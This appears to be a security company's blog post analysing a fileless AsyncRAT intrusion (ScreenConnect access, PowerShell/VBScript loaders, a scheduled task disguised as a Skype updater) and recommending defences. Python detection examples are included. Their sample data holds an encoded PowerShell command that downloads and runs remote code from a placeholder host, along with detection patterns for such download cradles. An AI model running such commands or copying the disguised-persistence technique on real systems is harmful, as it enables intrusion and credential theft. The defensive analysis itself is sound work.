
Cyber attackers are increasingly turning to stealth rather than brute force, and fileless malware is one of their most effective weapons. At LevelBlue, our Security Operations Center (SOC) and Labs teams recently analysed a live attack that used a fileless loader to deliver AsyncRAT, a Remote Access Trojan (RAT) with a range of credential-stealing and surveillance capabilities.
What made this case particularly instructive is the way the attacker relied on trusted utilities and memory-resident techniques to slip past many conventional defences. For organisations already stretched by rising cyber risk, the incident is a reminder that attackers are constantly innovating and exploiting the very tools IT teams depend on to do their jobs.
Inside the attack: From remote access to persistence
The attack began when the adversary gained access via ScreenConnect, a legitimate remote administration tool often used by IT teams. Rather than dropping obvious binaries onto the system, they executed a chain of scripts – a mixture of VBScript and PowerShell – that pulled down further components from external URLs. Those components included encoded .NET assemblies that ultimately unpacked into AsyncRAT, all while avoiding the tell-tale signs that traditional antivirus systems rely on.
One of the most striking aspects was persistence. To maintain a foothold, the attacker created a scheduled task masquerading as a benign “Skype Updater.” The name looked familiar enough to escape casual notice, yet behind the facade it was launching PowerShell commands that kept the malware running. This blend of legitimate-looking tools and stealthy scheduling allowed the attacker to survive reboots and evade routine clean-up.
The analysis of the command structure revealed multiple layers and a modular design. The AsyncClient executable supported a plugin architecture capable of dynamically loading payloads. Encryption routines based on AES secured its communications, and the malware handled a wide range of functions: from stealing credentials and clipboard contents to exfiltrating browser history. Each capability was wrapped in code designed to frustrate reverse engineering and delay detection.
Why this matters for organisations
It would be tempting to view this as an isolated case. The reality is that these techniques are spreading. Unfortunately, fileless malware is not confined to elite threat actors or rare incidents. It thrives precisely because it takes advantage of assumptions many IT teams make every day.
First, there is a natural trust placed in administrative tools. PowerShell, VBScript and ScreenConnect are essential to the day-to-day running of IT environments. Yet in this incident, those same tools became the delivery mechanism for malware. When organisations whitelist or relax monitoring on them, they unwittingly open a pathway for attackers.
Second, reliance on file-based signatures leaves a blind spot. Security tools that only scan for known malicious binaries on disk will struggle against code that executes entirely in memory. Fileless techniques shift the battle from “what’s written on the hard drive” to “what’s happening in real time in memory and processes.” Without behavioural monitoring, attackers gain a significant advantage.
Finally, the data at risk is not abstract. AsyncRAT is designed to exfiltrate high-value information: login credentials, browser histories, clipboard contents. For a company handling sensitive customer data, intellectual property, or financial records, for example, a single compromise could have regulatory, reputational and operational consequences far beyond the cost of initial remediation.
Defending against the fileless threat
Visibility into behaviour is paramount. It is no longer sufficient to know what files are present on an endpoint; teams need to understand how trusted tools are being used. PowerShell itself is not malicious, but PowerShell executing a heavily encoded script from an external URL should raise alarms. Monitoring command-line arguments, parent-child process relationships, and unusual usage patterns can provide the early warning signs that static scans will miss.
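To make the command-line and parent-child checks above concrete, here is an added example (not code from the LevelBlue analysis) that triages constructed process-creation records of the kind described: a remote-administration client spawning a script interpreter, and PowerShell running an encoded command that decodes to a download cradle. The event shape, the sample values and the `example.invalid` URL are assumptions for illustration.

```python
import base64
import re

# Constructed process-creation records (parent, child, command line) shaped like
# endpoint telemetry; illustrative only, not data from the incident.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe //B "C:\Users\Public\stage1.vbs"'},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + base64.b64encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
         .encode("utf-16-le")).decode()},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

REMOTE_ADMIN = ("screenconnect",)  # parent image substrings that warrant scrutiny
INTERPRETERS = ("wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe")
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-expression|\biex\b|https?://", re.I)
ENC_ARG = re.compile(r"-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Plaintext of a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def assess_event(ev):
    """Return the reasons this process-creation event looks suspicious ([] if none)."""
    reasons = []
    parent = ev["parent"].lower().rsplit("\\", 1)[-1]
    child = ev["image"].lower().rsplit("\\", 1)[-1]
    cmd = ev["cmdline"]
    # Lineage: a remote-admin client should not normally be the parent of a script host.
    if any(tag in parent for tag in REMOTE_ADMIN) and child in INTERPRETERS:
        reasons.append(f"remote-admin tool {parent} spawned script interpreter {child}")
    # Content: decode -enc payloads so the cradle keywords become visible to matching.
    if child in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None and CRADLE.search(decoded):
            reasons.append("encoded command decodes to a download cradle: " + decoded.strip())
    elif CRADLE.search(cmd):
        reasons.append("command line references remote content")
    return reasons
```

The third record is a plain administrative script launch and produces no finding, which is the point: the signal is the combination of lineage and decoded content, not the presence of PowerShell.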
Equally important is the ability to analyse what resides in memory. Many modern endpoint detection and response (EDR) tools provide hooks for this, but they require tuning and validation. Organisations should test whether their tools can detect encoded .NET assemblies loaded at runtime, or identify AES decryption routines operating in memory. Without this capability, attackers will continue to exploit the blind spot.
Persistence mechanisms also warrant closer scrutiny. Scheduled tasks are a powerful feature, but they are often overlooked during security audits. Regularly reviewing tasks for suspicious names or unexplained triggers can reveal attempts to masquerade as legitimate services. In the case we analysed, the attacker relied on nothing more exotic than the familiarity of a Skype “Updater” to maintain access.
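The scheduled-task review described above can be reduced to a few checks: does a task whose name sounds like a vendor updater actually run a script host instead of that vendor's binary, does its action live in a user-writable location, and is its trigger one that survives reboots? This added example (not LevelBlue's code) applies those checks to constructed task records; the record shape, names and paths are assumptions for illustration.

```python
import re

# Constructed scheduled-task records shaped like an export of task name, action
# executable, action arguments and trigger. Illustrative only, not the incident's data.
SAMPLE_TASKS = [
    {"name": r"\Skype Updater",
     "exe": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "args": "-w hidden -nop -enc SQBFAFgAIAAoAE4A", "trigger": "At log on"},
    {"name": r"\Microsoft\Windows\UpdateOrchestrator\Schedule Scan",
     "exe": r"C:\Windows\System32\usoclient.exe", "args": "StartScan", "trigger": "Daily"},
    {"name": r"\Adobe Acrobat Update Task",
     "exe": r"C:\Users\Public\Libraries\acroupd.vbs", "args": "", "trigger": "At startup"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
UPDATER_NAME = re.compile(r"updat|upgrade", re.I)
USER_WRITABLE = re.compile(r"^c:\\(users\\|programdata\\|windows\\temp\\)", re.I)
TRUSTED_ROOTS = re.compile(r"^c:\\(windows\\|program files( \(x86\))?\\)", re.I)
OBFUSCATION = re.compile(r"-e(?:c|nc|ncoded|ncodedcommand)?\s|-w(?:indowstyle)?\s+hidden|https?://", re.I)

def audit_task(task):
    """Return the reasons a scheduled task deserves review; a real vendor updater
    runs that vendor's own binary from its install directory, not a script host."""
    reasons = []
    exe = task["exe"].lower()
    binary = exe.rsplit("\\", 1)[-1]
    looks_like_updater = bool(UPDATER_NAME.search(task["name"]))
    if looks_like_updater and binary in SCRIPT_HOSTS:
        reasons.append(f"updater-style name but action is script host {binary}")
    if looks_like_updater and not TRUSTED_ROOTS.match(exe):
        reasons.append("updater-style name but action lives outside Windows/Program Files")
    if USER_WRITABLE.match(exe) or exe.endswith((".vbs", ".js", ".ps1", ".hta")):
        reasons.append("action is a script or runs from a user-writable location")
    if OBFUSCATION.search(task["args"]):
        reasons.append("arguments use encoding, hidden window or a remote URL")
    # A trigger only matters once something else looks wrong; logon/startup is what gives persistence.
    if reasons and re.search(r"log ?on|startup|boot", task["trigger"], re.I):
        reasons.append(f"trigger '{task['trigger']}' gives persistence across reboots/logons")
    return reasons

def review_tasks(tasks):
    """Return {task name: reasons} for tasks with at least one finding."""
    return {t["name"]: r for t in tasks if (r := audit_task(t))}
```

The genuine Windows Update task passes every check despite its "Update" name, so the name alone is never the signal; the mismatch between name, action and location is.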
Network monitoring remains another crucial line of defence. Fileless malware still needs to communicate with command and control (C2) infrastructure. Even when communications are encrypted, patterns can be detected: unusual destinations, odd timing of traffic, or repetitive bursts of small data transfers. By combining network indicators with threat intelligence – such as the hardcoded domains and encryption keys we extracted – defenders can identify compromises that may otherwise remain invisible.
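The timing and size patterns mentioned above can be measured without decrypting anything: per source/destination pair, compute how regular the gaps between connections are and how uniform the transfer sizes are. This added example (not part of the LevelBlue write-up) does that over constructed flow records; the thresholds, hosts and documentation-range addresses are assumptions for illustration.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed flow records (epoch seconds, source host, destination, bytes sent),
# shaped like firewall or NetFlow output. Illustrative only, not data from the incident.
BASE = 1_700_000_000
WEB = [(5, 3400), (41, 12000), (230, 900), (233, 51000), (600, 2200),
       (610, 700), (1200, 18000), (1207, 300), (2500, 4500)]
SAMPLE_FLOWS = (
    # roughly every 60 s with a couple of seconds of jitter, ~120-byte payloads: check-in loop
    [(BASE + 60 * i + i % 3, "ws-17", "203.0.113.45:8808", 118 + i % 4) for i in range(12)]
    # irregular timing and sizes: ordinary browsing to one site
    + [(BASE + off, "ws-17", "198.51.100.10:443", n) for off, n in WEB]
)

def coeff_var(xs):
    """Population std-dev divided by mean; 0 means perfectly regular."""
    m = mean(xs)
    return pstdev(xs) / m if m else 0.0

def beacon_score(times, sizes):
    """Regularity of inter-arrival gaps and of sizes; both near 0 is the
    fixed-interval, fixed-size signature of a C2 check-in loop."""
    gaps = [b - a for a, b in zip(times, times[1:])]
    return coeff_var(gaps), coeff_var(sizes)

def find_beacons(flows, min_flows=8, max_gap_cv=0.2, max_size_cv=0.2, max_bytes=1024):
    """Group flows per (source, destination) and return those that look like
    periodic, small, uniform check-ins."""
    groups = defaultdict(list)
    for ts, src, dst, nbytes in sorted(flows):
        groups[(src, dst)].append((ts, nbytes))
    findings = {}
    for key, recs in groups.items():
        if len(recs) < min_flows:          # too few samples to judge regularity
            continue
        times = [t for t, _ in recs]
        sizes = [n for _, n in recs]
        gap_cv, size_cv = beacon_score(times, sizes)
        if gap_cv <= max_gap_cv and size_cv <= max_size_cv and mean(sizes) <= max_bytes:
            gaps = [b - a for a, b in zip(times, times[1:])]
            findings[key] = {"flows": len(recs), "mean_gap_s": round(mean(gaps), 1),
                             "gap_cv": round(gap_cv, 3), "size_cv": round(size_cv, 3)}
    return findings
```

Real beacons often add deliberate jitter, so the tolerances are tunable; the browsing group fails on both regularity and size even with nine flows, which is what keeps the false-positive rate manageable.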
Finally, organisations should not underestimate the importance of least privilege and whitelisting. Allowing every endpoint to run remote access software or to execute arbitrary PowerShell scripts creates an environment that attackers can easily abuse. Restricting which tools are permitted, and under which user contexts, narrows the attack surface considerably.
The road ahead
Looking beyond this specific case, we see several trends shaping the threat landscape.
Attackers are leaning more heavily on legitimate remote administration tools as an initial foothold. They are disguising malware under names that echo everyday software updates or system services. Their use of encryption continues to evolve, with payloads only fully revealed when certain triggers are met. And critically, they are aiming for both theft and leverage, using exfiltrated data to threaten exposure, demand ransoms, or erode customer trust.
For IT leaders, this means preparation cannot be reactive. Fileless techniques blur the line between normal administration and malicious behaviour. Without proactive monitoring, behavioural baselines, and the capacity to hunt for indicators across memory, processes and network traffic, defenders will always be one step behind.
The AsyncRAT incident we investigated serves as a warning. But whilst it highlights how attackers are accelerating sophistication – fileless loaders, trusted utility abuse, minimal traces – it also shows what defenders can do when they adopt a proactive approach to shift the balance back in their favour.

Sean Shirley
Sean Shirley is SOC Analyst at LevelBlue.